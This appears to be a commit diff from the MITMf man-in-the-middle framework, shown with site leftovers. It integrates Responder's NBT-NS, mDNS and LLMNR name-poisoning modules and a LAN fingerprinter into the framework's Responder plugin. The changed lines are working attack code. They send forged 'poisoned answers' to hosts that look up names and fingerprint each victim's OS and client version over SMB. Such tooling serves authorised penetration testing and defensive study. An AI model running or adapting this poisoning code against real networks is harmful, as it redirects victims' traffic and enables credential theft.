|
|
||||||
else:
|
else:
|
||||||
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
|
mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
|
||||||
logger3.warning(Message)
|
|
||||||
|
|
||||||
if RespondToSpecificHost(RespondTo) and AnalyzeMode == False:
|
if RespondToSpecificHost(RespondTo) and args.analyze == False:
|
||||||
if RespondToIPScope(RespondTo, self.client_address[0]):
|
if RespondToIPScope(RespondTo, self.client_address[0]):
|
||||||
if data[2:4] == "\x01\x10":
|
if data[2:4] == "\x01\x10":
|
||||||
if Validate_NBT_NS(data,Wredirect):
|
if Validate_NBT_NS(data,args.wredir):
|
||||||
if RespondToSpecificName(RespondToName) == False:
|
if RespondToSpecificName(RespondToName) == False:
|
||||||
buff = NBT_Ans()
|
buff = NBT_Ans()
|
||||||
buff.calculate(data)
|
buff.calculate(data)
|
||||||
for x in range(1):
|
for x in range(1):
|
||||||
socket.sendto(str(buff), self.client_address)
|
socket.sendto(str(buff), self.client_address)
|
||||||
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
|
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
|
||||||
#responder_logger.info(Message)
|
if args.finger:
|
||||||
logger2.warning(Message)
|
|
||||||
if Is_Finger_On(Finger_On_Off):
|
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
#print '[+] OsVersion is:%s'%(Finger[0])
|
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
|
||||||
#print '[+] ClientVersion is :%s'%(Finger[1])
|
|
||||||
responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
|
|
||||||
responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
|
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
|
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
|
||||||
buff = NBT_Ans()
|
buff = NBT_Ans()
|
||||||
buff.calculate(data)
|
buff.calculate(data)
|
||||||
for x in range(1):
|
for x in range(1):
|
||||||
socket.sendto(str(buff), self.client_address)
|
socket.sendto(str(buff), self.client_address)
|
||||||
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
|
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
|
||||||
#responder_logger.info(Message)
|
if args.finger:
|
||||||
logger2.warning(Message)
|
|
||||||
if Is_Finger_On(Finger_On_Off):
|
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
#print '[+] OsVersion is:%s'%(Finger[0])
|
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
|
||||||
#print '[+] ClientVersion is :%s'%(Finger[1])
|
|
||||||
responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
|
|
||||||
responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
|
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
pass
|
pass
|
||||||
|
|
@ -167,42 +177,32 @@ class NB(BaseRequestHandler):
|
||||||
|
|
||||||
else:
|
else:
|
||||||
if data[2:4] == "\x01\x10":
|
if data[2:4] == "\x01\x10":
|
||||||
if Validate_NBT_NS(data,Wredirect) and AnalyzeMode == False:
|
if Validate_NBT_NS(data,args.wredir) and args.analyze == False:
|
||||||
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
|
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
|
||||||
buff = NBT_Ans()
|
buff = NBT_Ans()
|
||||||
buff.calculate(data)
|
buff.calculate(data)
|
||||||
for x in range(1):
|
for x in range(1):
|
||||||
socket.sendto(str(buff), self.client_address)
|
socket.sendto(str(buff), self.client_address)
|
||||||
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
|
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
|
||||||
#responder_logger.info(Message)
|
if args.finger:
|
||||||
logger2.warning(Message)
|
|
||||||
if Is_Finger_On(Finger_On_Off):
|
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
#print '[+] OsVersion is:%s'%(Finger[0])
|
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
|
||||||
#print '[+] ClientVersion is :%s'%(Finger[1])
|
|
||||||
responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
|
|
||||||
responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
|
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
if RespondToSpecificName(RespondToName) == False:
|
if RespondToSpecificName(RespondToName) == False:
|
||||||
buff = NBT_Ans()
|
buff = NBT_Ans()
|
||||||
buff.calculate(data)
|
buff.calculate(data)
|
||||||
for x in range(1):
|
for x in range(1):
|
||||||
socket.sendto(str(buff), self.client_address)
|
socket.sendto(str(buff), self.client_address)
|
||||||
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
|
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
|
||||||
#responder_logger.info(Message)
|
if args.finger:
|
||||||
logger2.warning(Message)
|
|
||||||
if Is_Finger_On(Finger_On_Off):
|
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
#print '[+] OsVersion is:%s'%(Finger[0])
|
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
|
||||||
#print '[+] ClientVersion is :%s'%(Finger[1])
|
|
||||||
responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
|
|
||||||
responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
|
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
pass
|
pass
|
||||||
|
|
@ -24,9 +24,12 @@ import threading
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from twisted.internet import reactor
|
from twisted.internet import reactor
|
||||||
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
|
||||||
from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
|
|
||||||
from core.utils import SystemConfig
|
from core.utils import SystemConfig
|
||||||
|
from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
|
||||||
|
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
||||||
|
from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
|
||||||
|
from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
|
||||||
|
from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
|
||||||
|
|
||||||
class Responder(Plugin):
|
class Responder(Plugin):
|
||||||
name = "Responder"
|
name = "Responder"
|
||||||
|
|
@ -48,6 +51,9 @@ class Responder(Plugin):
|
||||||
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
||||||
|
|
||||||
LLMNRPoisoner().start(options, self.ourip)
|
LLMNRPoisoner().start(options, self.ourip)
|
||||||
|
MDNSPoisoner().start(options, self.ourip)
|
||||||
|
NBTNSPoisoner().start(options, self.ourip)
|
||||||
|
LANFingerprinter().start(options)
|
||||||
|
|
||||||
if options.wpad:
|
if options.wpad:
|
||||||
WPADPoisoner().start()
|
WPADPoisoner().start()
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue